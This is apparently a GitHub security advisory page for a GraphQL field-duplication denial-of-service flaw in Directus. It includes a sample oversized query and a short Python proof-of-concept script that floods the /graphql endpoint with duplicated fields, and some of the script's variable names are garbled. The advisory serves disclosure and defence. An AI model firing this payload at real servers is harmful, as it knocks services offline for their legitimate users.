GHSA-7hmh-pfrp-vcx4
Suggest an improvement- Source
- https://github.com/advisories/GHSA-7hmh-pfrp-vcx4
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-7hmh-pfrp-vcx4/GHSA-7hmh-pfrp-vcx4.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-7hmh-pfrp-vcx4
- Aliases
- Related
- Published
- 2024-07-08T18:41:00Z
- Modified
- 2024-11-18T16:26:50Z
- Severity
-
- 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
- 7.1 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Directus GraphQL Field Duplication Denial of Service (DoS)
- Details
-
Summary
A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.
Details
Request to the endpoint /graphql are sent when visualizing graphs generated at a dashboard:
By modifying the data sent and duplicating many times the fields a DoS attack is possible.
PoC
The goal is to create a payload that generates a body like this, where the 'max' field is duplicated many times, each with the 'id' field duplicated many times inside it.
{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}Although that payload seems harmless, a bigger one leaves the service unresponsive.
The following code might serve as a PoC written in Python3: ```# Field Duplication DoS
GitHub @asantof
import requests
CHANGE THIS VALUES: url, authtoken, queryname, collection_name
url = 'http://0.0.0.0:8055/graphql' authtoken = '' queryname = 'queryXXXXX' collectionname = ''
headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {auth_token}', }
idpayload = 'id ' * 200 maxpayload = 'max {' + idpayload + ' } ' fullpayload = max_payload * 200
data = { 'query': 'query { ' + queryname + ': ' + collectionname + 'aggregated { ' + fullpayload + ' } }' }
print(data)
response = requests.post(url, headers=headers, json=data)
print(response.json()) ```
After running it the service will be unresponsive for a while:
Impact
The vulnerability impacts the service's availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.
- Database specific
{ "nvd_published_at": "2024-07-08T17:15:11Z", "cwe_ids": [ "CWE-400" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-07-08T18:41:00Z" }- References
Affected packages
npm / @directus/env
Package
- Name
- @directus/env
- View open source insights on deps.dev
- Purl
- pkg:npm/%40directus/env